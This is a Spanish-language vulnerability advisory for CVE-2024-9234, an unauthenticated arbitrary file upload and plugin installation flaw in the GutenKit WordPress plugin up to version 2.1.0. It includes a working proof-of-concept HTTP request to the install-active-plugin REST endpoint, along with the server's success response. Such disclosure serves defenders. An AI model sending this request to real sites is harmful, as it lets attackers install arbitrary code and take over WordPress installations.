
GutenKit <= 2.1.0 - Carga de archivos arbitraria no autenticada
GutenKit <= 2.1.0 - Subida Arbitraria de Archivos No Autenticada
El plugin GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor para WordPress es vulnerable a subidas arbitrarias de archivos debido a una falta de comprobación de capacidades en la función install_and_activate_plugin_from_external() (endpoint REST API install-active-plugin) en todas las versiones hasta la 2.1.0 inclusive. Esto permite a atacantes no autenticados instalar y activar plugins arbitrarios, o utilizar la funcionalidad para subir archivos arbitrarios disfrazados como plugins.
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
Enlace de descarga: Descargar gutenkit-blocks-addon Versión 2.1.0
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114
{
"plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
"slug": "popularis-extra"
}
{"success":true,"data":"Plugin installed successfully!"}